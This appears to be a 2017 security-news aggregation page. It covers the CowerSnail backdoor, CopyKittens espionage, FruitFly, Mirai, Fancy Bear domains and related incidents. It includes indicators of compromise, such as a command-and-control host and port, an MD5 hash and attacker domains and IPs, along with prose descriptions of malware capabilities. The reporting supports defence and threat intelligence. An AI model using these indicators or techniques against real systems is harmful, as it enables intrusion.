English Articles -

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


 


New Windows Backdoor Linked to SambaCry Linux Malware

26.7.2017 securityweek Virus

The cybercriminals who had recently delivered a cryptocurrency miner to Linux servers by exploiting the Samba vulnerability known as EternalRed and SambaCry are believed to have developed a backdoor designed for Windows systems.

The new malware, detected by Kaspersky Lab products as Backdoor.Win32.CowerSnail, uses the same command and control (C&C) server as the Linux malware, namely cl.ezreal.space:20480.

CowerSnail was created using Qt, a cross-platform development framework. Experts believe its authors may have leveraged Qt in order to directly transfer Unix code instead of having to learn using the Windows API. On the other hand, while it does make it easier to transfer code between platforms, Qt significantly increases the size of the resulting file.

Once it infects the system, the malware escalates the priority of its process and starts communicating with its C&C server through the IRC protocol.

CowerSnail can collect information about the compromised machine, receive updates, execute commands, install or uninstall itself as a service, and receive updates.

After it harvests system information and sends it back to the C&C domain, the malware exchanges pings with the server and waits for commands from the attackers.

“After creating two separate Trojans, each designed for a specific platform and each with its own peculiarities, it is highly probable that this group will produce more malware in the future,” explained Kaspersky’s Sergey Yunakovsky.

The SambaCry vulnerability exploited by the Linux malware linked to this threat actor, CVE-2017-7494, can be exploited to upload a shared library to a writable share and cause the server to load that library. This allows a remote attacker to execute arbitrary code on the targeted system.

The security hole, patched in May, affects the products of several vendors, including routers and network-attached storage (NAS) appliances. In fact, one piece of malware spotted by Trend Micro in early July leverages the SambaCry vulnerability to target NAS devices, particularly ones used by small and medium-size businesses.


Tech Giants Announce Plans for Removal of Flash

26.7.2017 securityweek IT

Apple, Facebook, Google, Microsoft and Mozilla have outlined their plans for moving away from Flash Player now that Adobe officially announced an end-of-life (EOL) and end-of-support date for the controversial product.

Adobe announced on Tuesday that, following discussions with several technology partners, it has decided to stop updating and distributing Flash Player at the end of 2020. The company has encouraged developers and content creators to migrate to open standards such as HTML5, WebGL and WebAssembly, which are supported by all major web browsers.

While Flash Player is still used by many websites and applications, the security community has been asking Adobe to retire the old software for several years due to the large number of vulnerabilities and numerous attacks involving Flash exploits.

Over the past years, web browser vendors and other Internet companies have taken steps to reduce the security risks associated with Flash Player by either limiting Flash content or banning it altogether.

Apple, Facebook, Google, Microsoft and Mozilla have promised to help with the transition and they have each outlined their plans for the complete removal of Flash support from their products.

Apple has been moving away from Flash since 2010. Currently, users need to manually install Flash if they need it and even so it remains disabled by default – manual approval is required on each website before the Flash plugin is executed.

Facebook, which still allows Flash games on its platform, says it has partnered with game developers to help them migrate to HTML5. The social media giant will accept Flash games until the end of 2020, but warned that the ability to play these games also depends on the decisions made by browser vendors.

Google pointed out that the number of Chrome users visiting a site with Flash every day has dropped from 80 percent three years ago to 17 percent today. Google has been and will continue to gradually phase out Flash – first by asking for explicit permission to run Flash content in more situations and eventually disabling it by default. The company wants to remove it completely toward the end of 2020.

Microsoft, which updates the Flash Player components used by its products every Patch Tuesday, wants to disable Flash by default in both Edge and Internet Explorer in mid-to-late 2019. Even if users will re-enable it, they will still need to manually approve Flash for each website. Flash will be removed completely by the end of 2020.

Moziila’s roadmap for Flash is similar. The organization wants to disable Flash by default for most users in 2019, while allowing Extended Support Release (ESR) users to continue viewing Flash content through the end of 2020.


New CowerSnail Windows Backdoor linked to SHELLBIND SambaCry Linux Malware
26.7.2017 securityaffairs
Virus 

Malware researchers at Kaspersky Lab have found a new Windows Backdoor dubbed CowerSnail linked to the recently discovered SHELLBIND SambaCry Linux malware.
Security experts at Kaspersky Lab have spotted a new Windows Backdoor dubbed CowerSnail linked to the recently discovered SHELLBIND SambaCry Linux malware.

SHELLBIND has infected most network-attached storage (NAS) appliances, it exploits the Samba vulnerability (also known as SambaCry and EternalRed) to upload a shared library to a writable share, and then cause the server to load that library.

This trick allows a remote attacker to execute arbitrary code on the targeted system.

SHELLBIND and the Backdoor.Win32.CowerSnail shares the command and control (C&C) server (cl.ezreal.space:20480).

“We recently reported about SambaCry, a new family of Linux Trojans exploiting a vulnerability in the Samba protocol. A week later, Kaspersky Lab analysts managed to detect a malicious program for Windows that was apparently created by the same group responsible for SambaCry.” states Kaspersky. “It was the common C&C server that both programs used – cl.ezreal.space:20480 – that suggested a relationship between them.”

The CowerSnail backdoor was developed using the cross-platform development framework Qt, a design choice to allow rapid migration of the malicious code developed for Unix platform to a Windows environment.

SambaCry was designed for *nix-based systems, meanwhile, CowerSnail was written using Qt because the author didn’t want to go into the details of WinAPI and migrated the code the *nix code “as is”.

On the other hand, while it does make it easier to transfer code between platforms, Qt significantly increases the size of the resulting file.

The drawback in using Qt is the increasing of the size of the resulting file.

“This framework provides benefits such as cross-platform capability and transferability of the source code between different operating systems. This, however, has an effect on the resulting file size: the user code ends up as a small proportion of a large 3 MB file.” continues Kaspersky.

CowerSnail first escalates the process priority and the current thread’s priority, then it starts communicating with its Command & Control server through the IRC protocol.

CowerSnail implements classic backdoor features, it can collect information about the infected system (Timestamp, Installed OS type (e.g. Windows), OS nameHost name, Information about network interfaces, ABI Core processor architecture
Information about physical memory), it can execute commands, install or uninstall itself as a service, and receive updates.

cowersnail

The experts believe that the same threat actor has developed the two Trojans, each designed for a specific purpose.

“After creating two separate Trojans, each designed for a specific platform and each with its own peculiarities, it is highly probable that this group will produce more malware in the future,” concluded Kaspersky Lab.


CrowdStrike presented the fastest and largest cybersecurity search engine
26.7.2017 securityaffairs Cyber

CrowdStrike Inc., the leader in cloud-delivered endpoint protection, announced the fastest and largest cybersecurity search engine.
Security firm CrowdStrike, the leader in cloud-delivered endpoint protection, announced a significant improvement of its Falcon platform that has been integrated with a powerful cybersecurity search engine.
According to the company the cybersecurity search engine has high performance, it claims it is more than 250 times faster than other malware search tools.

The search engine is powered by Falcon MalQuery, which CrowdStrike claims is more than 250 times faster than other malware search tools.

MalQuery has developed a patent-pending indexing technology that allows used to perform real time searching in a huge repository of threats events and malicious codes.

The company has indexed more than 700 million files totaling over 560 TB of malware and collected data related to 51 billion security events every day.

“This platform has grown to be the largest and most active repository of threat events and artifacts in the industry, indexing over 50 billion events per day and amassing a 560TB collection of 700 million files.” reads the announcement published by CrowdStrike.”CrowdStrike’s patent pending indexing technology makes all of this data available for real-time search. Organizations can now search for malware — both metadata and binary content — and get results from the Falcon platform in seconds.”

crowdstrike cybersecurity search engine

The users can query the system for plain text (ASCII and Unicode) or binary search (HEX) along with YARA-based queries.
The results are augmented “with CrowdStrike intelligence so the severity and context of the threat is clear.”


“Today’s threat landscape demands speed and precision – some of the best minds in cybersecurity are hampered by slow search tools and limited data sets. We believe that real-time data access is how cybersecurity professionals can get ahead of modern-day threats, and we’ve built the fastest AI-enabled platform that makes this possible,” said George Kurtz, CrowdStrike co-founder and CEO.

“With today’s launch, we are fundamentally changing the game by empowering threat researchers to outpace the adversary with this solution. CrowdStrike Falcon Search Engine enables the next-gen SOC to be more productive and acts as a powerful force multiplier for security teams,”

Recently the cyber security firm announced a partnership with security firm Dragos to provide cybersecurity services for industrial control systems (ICS).


Gang Behind Fireball Malware that Infected 250 Million PCs Busted by Police
26.7.2017 thehackernews 
Virus


Chinese authorities have recently initiated a crackdown on the operators of a massive adware campaign that infected around 250 Million computers, including Windows and Mac OS, across the world earlier this year.
The adware campaign was uncovered by security researchers at Check Point last month after it already infected over 25 million computers in India, 24 million in Brazil, 16 million in Mexico, 13 million in Indonesia and 5.5 million in the United States.
Dubbed Fireball, the infamous adware comes bundled with other free legitimate software that you download off the Internet.
Once installed, the malware installs browser plug-ins to manipulate the victim's web browser configurations and replace their default search engines and home pages with fake search engines.
Far from legitimate purposes, Fireball has the ability to spy on victim's web traffic, execute malicious code on the infected computers, install plugins, and even perform efficient malware dropping, creating a massive security hole in targeted systems and networks.
fireball-chinese-adware-software
At the time, Check Point researchers linked the operation to Rafotech, a Beijing-based Chinese firm which claims to offer digital marketing and game apps to 300 million customers, blaming the company for using Fireball for generating revenue by injecting ads into the web browsers.
Now, Beijing Municipal Public Security Bureau Network Security Corps have made 11 arrests in the case.
All the suspects are Rafotech employees, three of which worked as the company's president, technical director, and operations director, Chinese new agency reports.
Chinese outlets report that the Fireball developers made a profit of 80 Million Yuan (nearly US$12 million) from the adware campaign.
The establishment of Rafotech was jointly funded by several people in 2015, and by the end of the year, they developed the Fireball virus for the advertising fraud, which redirects the victim's every query to either Yahoo.com or Google.com and includes tracking pixels that collect the victim's information.
All the arrested suspects have allegedly admitted of the development and distribution of the Fireball malware. The arrests began in June shortly after the story about Fireball went online.
No doubt, the company was using the Fireball adware to boost its advertisements and gain revenue, but at the same time, the adware has the capability to distribute additional malware, which may come up as a potential disaster in future.


CowerSnail, from the creators of SambaCry
26.7.2017 Kaspersky 
Virus

We recently reported about SambaCry, a new family of Linux Trojans exploiting a vulnerability in the Samba protocol. A week later, Kaspersky Lab analysts managed to detect a malicious program for Windows that was apparently created by the same group responsible for SambaCry. It was the common C&C server that both programs used – cl.ezreal.space:20480 – that suggested a relationship between them.

Kaspersky Lab products detect the new malicious program as Backdoor.Win32.CowerSnail. MD5: 5460AC43725997798BAB3EB6474D391F

CowerSnail was compiled using Qt and linked with various libraries. This framework provides benefits such as cross-platform capability and transferability of the source code between different operating systems. This, however, has an effect on the resulting file size: the user code ends up as a small proportion of a large 3 MB file.

First stage

First of all, CowerSnail escalates the process priority and the current thread’s priority.

Then it uses the StartServiceCtrlDispatcher API to launch the main C&C communication thread as a control manager service.

If the thread is successfully launched as a service, further communication with the C&C is carried out through that service; otherwise, CowerSnail operates without it. CowerSnail can also accept various variables as input, such as the C&C host. When these are absent, the required data is extracted from the file itself.

Invoking the main C&C communication method will look like this in the control service routine (the method is stated as ‘route’).

C&C server communication

Traffic analysis shows that the bot communicates with the C&C via the IRC protocol. This can be seen from the characteristic ‘CHANNEL’ command and the subsequent exchange of pings, which often occurs in IRC botnets made up of IoT devices.

The first two bytes are the ‘pk’ signature which occurs in each packet except the CHANNEL command. The DWORD that follows is the size of the remaining part of the packet:

The name of each field is encoded in Unicode and is preceded by field length. The RequestReturn/Request DWORD coming after the status bar shows the number of variables for the variable RequestReturn. In this example, there are three variables: ‘success’, ‘I’ and ‘result’. Each of these fields, in turn, can contain more nested variables. The screenshot below shows the response to the SysInfo request in which CowerSnail sends 14 (0xE) different strings containing information about the infected system. The type of variable is stated after its name, followed by its value.

The structures of the request packet and the response packet are slightly different. The server’s request includes the request name coded as Request->arg->type->”Ping/SysInfo/Install”, as well as extra parameters that are nested into the arg field.

Here are examples of several variable types:

0x00000005 – Integer variable

0x0000000A – String variable

After registering the infected host at the C&C server, which includes sending information about the infected system, CowerSnail exchanges pings with the server and waits for commands.

Commands

Unlike SambaCry, CowerSnail does not download cryptocurrency mining software by default, but instead provides a standard set of backdoor functions:

Receive update (LocalUpdate)
Execute any command (BatchCommand)
Install CowerSnail as a service, using the Service Control Manager command line interface (Install)
Uninstall CowerSnail from service list (Uninstall)
Collect system information:
Timestamp
Installed OS type (e.g. Windows)
OS name
Host name
Information about network interfaces
ABI
Core processor architecture
Information about physical memory

Conclusion

SambaCry was designed for *nix-based systems. CowerSnail, meanwhile, was written using Qt, which most probably means the author didn’t want to go into the details of WinAPI, and preferred to transfer the *nix code “as is”. This fact, along with the same C&C being used by both programs, strongly suggests that CowerSnail was created by the same group that created SambaCry. After creating two separate Trojans, each designed for a specific platform and each with its own peculiarities, it is highly probable that this group will produce more malware in the future.


Experts Unveil Cyber Espionage Attacks by CopyKittens Hackers
26.7.2017 thehackernews  CyberSpy
Security researchers have discovered a new, massive cyber espionage campaign that mainly targets people working in government, defence and academic organisations in various countries.
The campaign is being conducted by an Iran-linked threat group, whose activities, attack methods, and targets have been released in a joint, detailed report published by researchers at Trend Micro and Israeli firm ClearSky.
Dubbed by researchers CopyKittens (aka Rocket Kittens), the cyber espionage group has been active since at least 2013 and has targeted organisations and individuals, including diplomats and researchers, in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany.
The targeted organisations include government institutions like Ministry of Foreign Affairs, defence companies, large IT companies, academic institutions, subcontractors of the Ministry of Defense, and municipal authorities, along with employees of the United Nations.
The latest report [PDF], dubbed "Operation Wilted Tulip," details an active espionage campaign conducted by the CopyKittens hackers, a vast range of tools and tactics they used, its command and control infrastructure, and the group's modus operandi.
How CopyKittens Infects Its Targets
The group used different tactics to infiltrate their targets, which includes watering hole attacks — wherein JavaScript code is inserted into compromised websites to distribute malicious exploits.
The news media and organisations whose websites were abused as watering hole attacks include The Jerusalem Post, for which even German Federal Office for Information Security (BSI) issued an alert, Maariv news and IDF Disabled Veterans Organization.
Besides water hole attacks, CopyKittens also used other methods to deliver malware, including:
Emailed links to malicious websites controlled by attackers.
Weaponized Office documents exploiting recently discovered flaw (CVE-2017-0199).
Web servers exploitation using vulnerability scanner and SQLi tools like Havij, sqlmap, and Acunetix.
Fake social media entities to build trust with targets and potentially spread malicious links.
"The group uses a combination of these methods to persistently target the same victim over multiple platforms until they succeed in establishing an initial beachhead of infection – before pivoting to higher value targets on the network," Trend Micro writes in a blog post.
In order to infect its targets, CopyKittens makes use of its own custom malware tools in combination with existing, commercial tools, like Red Team software Cobalt Strike, Metasploit, post-exploitation agent Empire, TDTESS backdoor, and credential dumping tool Mimikatz.
Dubbed Matryoshka, the remote access trojan is the group's self-developed malware which uses DNS for command and control (C&C) communication and has the ability to steal passwords, capture screenshots, record keystrokes, collect and upload files, and give the attackers Meterpreter shell access.
"Matryoshka is spread through spear phishing with a document attached to it. The document has either a malicious macro that the victim is asked to enable or an embedded executable the victim is asked to open," Clear Sky says in a blog post.
The initial version of the malware was analysed in 2015 and seen in the wild from July 2016 until January 2017, though the group also developed and used Matryoshka version 2.
Users are recommended to enable two-factor authentication in order to protect their webmail accounts from being compromised, which is a treasure trove of information for hackers, and an "extremely strong initial beachhead" for pivoting into other targets.


Hacker Steals $8.4 Million in Ethereum (4th Heist In A Month)
26.7.2017 thehackernews  Incindent
More Ethereum Stolen!
An unknown hacker has just stolen nearly $8.4 Million worth of Ethereum – one of the most popular and increasingly valuable cryptocurrencies – in yet another Ethereum hack that hit Veritaseum's Initial Coin Offering (ICO).
This incident marks as the fourth Ethereum hack this month and second cyber attack on an ICO, following a theft of $7 Million worth of Ether tokens during the hack of Israeli startup CoinDash's initial coin offering last week.
A few days ago, a hacker also stole nearly $32 Million worth of Ethereum from wallet accounts by exploiting a critical vulnerability in Parity's Ethereum Wallet software, which followed a $1 Million worth of Ether and Bitcoins heist in crypto currency exchange Bithumb earlier this month.
Now, Veritaseum has confirmed that a hacker stole $8.4 Million in Ether (ETH) from its ICO this Sunday, July 23.
"We were hacked, possibly by a group. The hack seemed to be very sophisticated, but there's at least one corporate partner that may have dropped the ball and be liable. We will let the lawyers sort that out if it goes that far," Veritaseum founder Reggie Middleton confirmed the theft on the BitcoinTalk forum.
Middleton has called the recent Ethereum hack "inconsequential," saying some of his partners (unnamed corporate third party services) may be responsible for the attack.
Middleton said that due to the high demand of the VERI tokens during the ICO held over the weekend, the hacker first managed to steal those tokens and then immediately sold them to other buyers "within a few hours" for the cryptocurrency.
The hacker made off an estimated $8.4 million in ETH during that a relatively short period of time. The stolen funds were first dumped into two separate Ethereum wallets and then were moved to other accounts.
It looks like around 37,000 VERI tokens were stolen out of 100 Million in the recent theft, though the good news is that the Ethereum theft does not affect actual ICO investors, as Middleton says the stolen tokens belonged to him and his team members.
"There are 100M tokens issued; the hackers stole about 37k. As I said, it is quite disconcerting, but it is not the end [of] the world. In the scheme of things, this is small," Middleton says.
"The tokens were stolen from me, not the token buyers. I am not downplaying the seriousness of the heist either, but I am looking at the heist for what it is. A company that we use was compromised, the vulnerability was closed, and we are investigating whether we should move against that company or not."
At the moment, Middleton did not disclose the attack vector that was exploited to sweep out $8.4 Million in ETH, though he assured users that his team had taken necessary measures to prevent the attack from happening in the future.


Apple Users, Beware! A Nearly-Undetectable Malware Targeting Mac Computers
26.7.2017 thehackernews  Apple
Yes, even Mac could also get viruses that could silently spy on its users. So, if you own a Mac and think you are immune to malware, you are wrong.
An unusual piece of malware that can remotely take control of webcams, screen, mouse, keyboards, and install additional malicious software has been infecting hundreds of Mac computers for more than five years—and it was detected just a few months back.
Dubbed FruitFly, the Mac malware was initially detected earlier this year by Malwarebytes researcher Thomas Reed, and Apple quickly released security patches to address the dangerous malware.
Now months later, Patrick Wardle, an ex-NSA hacker and now chief security researcher at security firm Synack, discovered around 400 Mac computers infected with the newer strain of the FruitFly malware (FruitFly 2) in the wild.
Wardle believes the number of infected Macs with FruitFly 2 would likely be much higher, as he only had access to some servers used to control FruitFly.
Although it is unknown who is behind FruitFly or how the malware gets into Mac computers, the researchers believe the nasty malware has been active for around ten years, as some of its code dates back to as far as 1998.
"FruitFly, the first OS X/macOS malware of 2017, is a rather intriguing specimen. Selectively targeting biomedical research institutions, it is thought to have flown under the radar for many years," Wardle wrote in the abstract of his talk, which he is going to present at the Black Hat later this week.
Since the initial infection vector for FruitFly is unclear, like most malware, Fruitfly could likely infect Macs either through an infected website delivering the infection or via phishing emails or a booby-trapped application.
FruitFly is surveillance malware that's capable of executing shell commands, moving and clicking a mouse cursor, capturing webcam, killing processes, grabbing the system's uptime, retrieving screen captures, and even alerting the hacker when victims are again active on their Mac.
"The only reason I can think of that this malware has not been spotted before now is that it is being used in very tightly targeted attacks, limiting its exposure," Reed wrote in the January blog post.
"Although there is no evidence at this point linking this malware to a specific group, the fact that it has been seen specifically at biomedical research institutions certainly seems like it could be the result of exactly that kind of espionage."
Wardle was able to uncover FruitFly victims after registering a backup command and control (C&C) server that was once used by the attacker. He then noticed around 400 Mac users infected with FruitFly started connecting to that server.
From there, the researcher was also able to see IP addresses of FruitFly infected victims, indicating 90 percent of victims were located in the United States.
Wardle was even able to see the name of victims' Macs as well, making it "really easy to pretty accurately say who is getting infected," he told Forbes.
But rather than taking over those computers or spying on the victims, Wardle contacted law enforcement and handed over what he found to law enforcement agents, who are now investigating the matter.
Wardle believes surveillance was the primary purpose of FruitFly, though it is yet unclear whether it is government or other hacker groups.
"This did not look like cyber crime type behaviour; there were no ads, no keyloggers, or ransomware," Wardle said. "Its features had looked like they were actions that would support interactivity—it had the ability to alert the attacker when users were active on the computer, it could simulate mouse clicks and keyboard events."
Since the Fruitfly's code even includes Linux shell commands, the malware would work just fine on Linux operating system. So, it would not come as a surprise if a Linux variant of Fruitfly was in operation.


British Hacker Admits Using Mirai Botnet to DDoS Deutsche Telekom
26.7.2017 thehackernews 
BotNet
An unnamed 29-year-old man, named by authorities as "Daniel K.," pleaded guilty in a German court on Friday to charges related to the hijacking of more than one Million Deutsche Telekom routers.
According to reports in the German press, the British man, who was using online monikers "Peter Parker" and "Spiderman," linked to domains used to launch cyber attacks powered by the notorious Mirai malware has been pleaded guilty to "attempted computer sabotage."
The suspect was arrested on 22nd February this year at Luton airport in London by Britain's National Crime Agency (NCA) at the request of the Federal Criminal Police Office of Germany, aka the Bundeskriminalamt (BKA).
The hacker, also known as 'BestBuy,' admitted to the court on Friday that he was behind the cyber attack that knocked more than 1.25 Million customers of German telecommunications provider Deutsche Telekom offline last November.
According to the German authorities, the attack was especially severe and was carried out to compromise the home routers to enrol them in a network of hijacked devices popularly called Botnet, which is being offered for sale on dark web markets for launching DDoS attacks.
Late last year, Deutsche Telekom's routers became infected with a modified version of the Mirai malware – infamous IoT malware which scans for insecure routers, cameras, DVRs, and other IoT devices and enslaves them into a botnet network – causing over a million pounds' worth of damage, the company said at the time.
Mirai is the same botnet that knocked the entire Internet offline last year by launching massive distributed denial of Service (DDoS) attacks against the Dyn DNS provider, crippling some of the world's biggest and most popular websites, including Twitter, Netflix, Amazon, Slack, and Spotify.
Mirai leveraged attack experienced sudden rise after a cyber criminal in October 2016 publicly released the source code of Mirai, which is then used to by many cyber criminals to launch DDoS attacks.
The hacker reportedly told the court that a Liberian internet service provider (ISP) paid him $10,000 to carry out the attack against its competitors., and that Deutsche Telekom was not the main target of his attack.
At the time of his arrest, the suspect faced up to 10 years in prison. He's due to be sentenced on July 28.
The BKA got involved in the investigation as the attack on Deutsche Telekom was deemed to be a threat to the nation's communication infrastructure.
The investigation involved close cooperation between British, German and Cypriot law enforcement agencies, backed by the European Union's law enforcement intelligence agency, Europol, and Eurojust.


Georgian News Site Serves New Version of Old Mac Trojan

26.7.2017 securityweeek Apple

Researchers at security firm Volexity noticed that the website of a media organization based in the country of Georgia had been serving a new version of an old Mac Trojan to specific visitors.

According to experts, the compromised news website has English, Russian and Georgian sections, but only the Georgian language pages appeared to deliver the malware. The threat is a new version of OSX/Leverage, a backdoor first spotted back in 2013.

Interestingly, not all visitors were targeted. JavaScript code planted on the site profiled each user and only served the malware if certain conditions were met. The malware was pushed only to devices whose user agent showed that the victim accessed the site from a Mac and a web browser other than Chrome.

The script also checked cookies to determine if the user had previously visited the website and analyzed the malicious JavaScript code. If a returning user is detected, the exploitation chain is terminated.

If all the conditions are met and the potential victim is using the Safari browser from a Mac computer, an iframe is loaded and a fake Adobe website is displayed. The site is designed to trick users into downloading a fake Flash Player critical update.

The malicious Flash Player update is delivered via a Metasploit module that abuses Safari functionality to force the download and execution of an OS X application. However, the victim still needs to allow the execution of the file when prompted or manually execute it from the Downloads folder.

Once executed, the malware creates a Launch Agent for persistence and opens the genuine Adobe Flash Player website to avoid raising suspicion. The backdoor contacts its command and control (C&C) server and sends it information about the infected system.

“Unlike the earlier version of the malware, this new version does not limit itself to a predefined set of commands and instead allows an unrestricted command shell capability back into an infected system,” Volexity researchers said in a blog post.

The new version of the Leverage malware, which was also spotted by Sophos earlier this month, is signed with an Apple code signing certificate issued to a developer apparently named “Aleks Papandopulo.”

The first version of Leverage had been disguised as an image file and in some cases it downloaded a logo of the Syrian Electronic Army hacker group onto compromised machines.

Interestingly, Volexity has discovered a link between an IP address associated with one of the domains serving the new version of Leverage and Stantinko, a recently uncovered botnet that has powered a massive adware campaign since 2012. The Stantinko operation has mainly targeted Russia and Ukraine.


Tech Firms Target Domains Used by Russia-linked Threat Group

26.7.2017 securityweeek APT

Tech companies ThreatConnect and Microsoft are moving toward exposing and taking down domains associated with Russia-linked threat group known as Fancy Bear.

Also tracked as APT28, Pawn Storm, Sofacy, Tsar Team, Strontium and Sednit, the threat group has been associated with a variety of high-profile cyber-attacks aimed at government and other types of organizations worldwide.

Last year, the threat group was said to have orchestrated election-related hacker attacks in the United States. The actor allegedly developed the so called XTunnel malware specifically to compromise the Democrat National Committee (DNC) network last year, and was said in February 2017 to be using brand new Mac malware to steal data.

ThreatConnect says their team was able to identify “dozens of recently registered domains and IPs that have varying levels of association to the Russian APT.” Moreover, the security firm discovered three name servers the group most likely used for domains, which allows defenders to “proactively identify new domains that may be associated with Fancy Bear activity”.

One of the domains, the security company reveals, is unisecproper[.]org, which was registered using the email address le0nard0@mail[.]com and is hosted on a dedicated server at the IP 92.114.92.134. The certificate used by this domain has been already associated (PDF) with Fancy Bear in operations targeting the DNC and German Parliament, which clearly indicates that the domain is associated with the group.

Using the SSL certificate, ThreatConnect discovered recent IPs associated with Fancy Bear, along with numerous domains hosted on these IPs, also supposedly associated with the threat group. Some of these domains were discovered in previous investigations as well.

The researchers also managed to find name servers used by Fancy Bear, including nemohosts[.]com, bacloud[.]com, and laisvas[.]lt. The investigation eventually led to the discovery of hundreds of domains associated with these name servers, tens of which were hosted on dedicated servers.

The researchers note these are suspicious domains but note that “consistencies in registration and hosting tactics do not definitively associate many of these suspicious domains with previous malicious, Fancy Bear activity.”

“It's important to caveat our confidence in these indicators' association to FANCY BEAR activity. For many of those indicators that we've included here, we don't know whether they have actually been used maliciously. But if known bad is all that you are worried about or interested in, then you'll always be at least one step behind the attacker. Only by leveraging intelligence to identify and exploit our adversaries' tactics can we move from a reactive, whack-a-mole state to a proactive, informed defense,” ThreatConnect says.

Microsoft, in the meantime, is taking legal action against Fancy Bear: the tech company filed a civil lawsuit in August 2016, seeking to seize command-and-control (C&C) domains used by the group. According to court documentation Microsoft made public, there are hundreds of domains containing Microsoft trademarks that it is looking to take control of.

The actors failed to appear in a federal court in Virginia to defend themselves, and Microsoft is pushing for a default judgment in its favor. By seizing the domains, Microsoft would be able to cut the group off from communicating with infected systems.

“Microsoft seeks a preliminary injunction directing the registries associated with these Internet domains to take all steps necessary to disable access to and operation of these Internet domains to ensure that changes or access to the Internet domains cannot be made absent a court order and that all content and material associated with these Internet domains are to be isolated and preserved pending resolution of the dispute. Microsoft seeks a permanent injunction, other equitable relief and damages,” Microsoft notes.

Previously, Microsoft used legal action to take down botnets. In 2012, as part of Operation b71, the company seized C&C servers associated with the notorious Zeus family of malware. In 2014, in an attempt to take down the Bladabindi (njRAT) and Jenxcus (NJw0rm) malware families, the company seized 23 No-IP domains to route bad traffic to a sinkhole.


Iranian 'CopyKittens' Conduct Foreign Espionage

26.7.2017 securityweeek CyberSpy

CopyKittens Iran cyberspies

An Iran-linked threat group named by researchers CopyKittens has been conducting foreign espionage on strategic targets in various countries. Trend Micro and ClearSky have published a report detailing the actor’s activities, including targets, tools and attack methods.

The first report on CopyKittens was published in November 2015, but the group is believed to have been active since at least 2013. The hackers initially appeared to mainly target Israeli individuals, including diplomats and researchers, but further analysis showed that its operations have also covered entities in Saudi Arabia, Turkey, the United States, Jordan and Germany.

The list of targets includes government organizations, academic institutions, IT firms, defense companies and contractors, municipal authorities, and employees of the United Nations.

According to the latest report on CopyKittens activity, dubbed Operation Wilted Tulip, the hackers have used a wide range of tools and tactics. In some cases, they relied on watering hole attacks where news and other websites were compromised and set up to deliver exploits. The organizations whose websites were abused as watering holes includes The Jerusalem Post, for which even Germany’s Federal Office for Information Security (BSI) issued an alert.

The hackers also delivered malware using malicious documents set up to exploit various vulnerabilities, including the recently discovered Office flaw tracked as CVE-2017-0199, which at one point was a zero-day. In one attack, the hackers breached the email account of an employee of the Ministry of Foreign Affairs in the Turkish Republic of Northern Cyprus. The compromised account was used to send out a weaponized document to foreign affairs ministries in various countries around the world.

Some of the attacks targeting Israeli entities also leveraged fake social media profiles, often appearing to belong to attractive women.

As for the tools and malware used by CopyKittens, they leveraged automated scanning and exploitation tools such as Havij, sqlmap and Acunetix to find vulnerabilities in the targeted websites.

The threat actor has used both its own and widely available malware and tools, including the TDTESS backdoor, the Matryoshka RAT, the Vminst lateral movement tool, the Cobalt Strike threat emulation software, Mimikatz, Metasploit, the ZPP compression utility, and the Empire post-exploitation tool.

Some of the tools and malware have allowed the group to use DNS for command and control (C&C) communications and data exfiltration.

CopyKittens is not the only Iran-linked cyber espionage group. In the past years, security firms have also exposed the activities of actors known as Rocket Kitten, COBALT GYPSY, and Charming Kitten (Newscaster, NewsBeef).


CrowdStrike Launches Cybersecurity Search Engine

26.7.2017 securityweeek Cyber

Cloud-based endpoint security firm CrowdStrike announced on Tuesday that it has expanded the capabilities of its Falcon platform by adding a powerful search engine.

The search engine is powered by Falcon MalQuery, which CrowdStrike claims is more than 250 times faster than other malware search tools. MalQuery uses a patent-pending indexing technology and it allows users to filter results so that they are provided only the most relevant information.CrowdStrike

CrowdStrike says its threat database has indexed more than 700 million files totaling over 560 TB of malware, and it ingests over 51 billion security events every day. String- and YARA-based searches can be conducted via a single console and results are displayed as schematized, readily consumable snapshots.

The results of the search, which analyzes both a file’s metadata and content, are augmented with CrowdStrike intelligence to provide security operations center (SOC) personnel information on context and severity.

The security firm pointed out that faster and more accurate search results help streamline security operations, which ultimately leads to improved protection against new threats.

“Today’s threat landscape demands speed and precision – some of the best minds in cybersecurity are hampered by slow search tools and limited data sets. We believe that real-time data access is how cybersecurity professionals can get ahead of modern-day threats, and we’ve built the fastest AI-enabled platform that makes this possible,” said George Kurtz, CrowdStrike co-founder and CEO.

“With today’s launch, we are fundamentally changing the game by empowering threat researchers to outpace the adversary with this solution. CrowdStrike Falcon Search Engine enables the next-gen SOC to be more productive and acts as a powerful force multiplier for security teams,” Kurtz added.

Earlier this month, CrowdStrike announced that it teamed up with Dragos to provide cybersecurity services for industrial control systems (ICS).


Bot vs Bot in Never-Ending Cycle of Improving Artificial intelligence

26.7.2017 securityweeek BotNet

Artificial intelligence, usually in the form of machine learning (ML), is infosecurity's current buzz. Many consider it will be the savior of the internet, able to defeat hackers and malware by learning and responding to their behavior in all-but real time. But others counsel caution: it is a great aid; but not a silver bullet.

The basic problem is that if machine learning can learn to detect malware, machine learning can learn to avoid detection by machine learning. This is a problem that exercises Hyrum Anderson, technical director of data science at Endgame.

At the BSides Las Vegas in August 2016 he presented his work on a 'Deep Adversarial Architectures for Detecting (and Generating!) Maliciousness'. He described the concept of using red team vs blue team gaming, where a 'malicious' algorithm continually probes a defensive algorithm looking for weakness, and the defensive algorithm learns from the probes how to improve itself.

Bot vs BotThis week, at the Black Hat conference, Anderson takes the concept further in a presentation titled 'Testing Machine Learning Malware Detection via Adversarial Probing'. The purpose is simple -- to use machine learning to test and improve machine learning defenses. In reality, it is an important step in the continuing battle between attackers and defenders.

Omri Moyal, co-founder and VP of research at Minerva, explains. "Given the increased adoption of anti-malware products that use machine learning, most adversaries will soon arm themselves with the capabilities to evade it," he told SecurityWeek. "The most sophisticated attackers will develop their own offensive models. Some will copy ideas and code from various publicly-available research papers and some will even use simple trial and error, or replicate the offensive efforts of another group. In this cat-and-mouse chase, the defenders should change their model to mark the evolved attack tool as malicious. A process which is the modern version of 'malware signature' but more complex."

Anderson's theories will help the defender to stay ahead of the attacker by being both cat and mouse. His Black Hat presentation starts with the understanding that "all machine learning models have blind spots or hallucination spots (modeling error)." At the same time, an advanced attacker knows what models are used by the defender; and can use his own ML to probe for those blind spots.

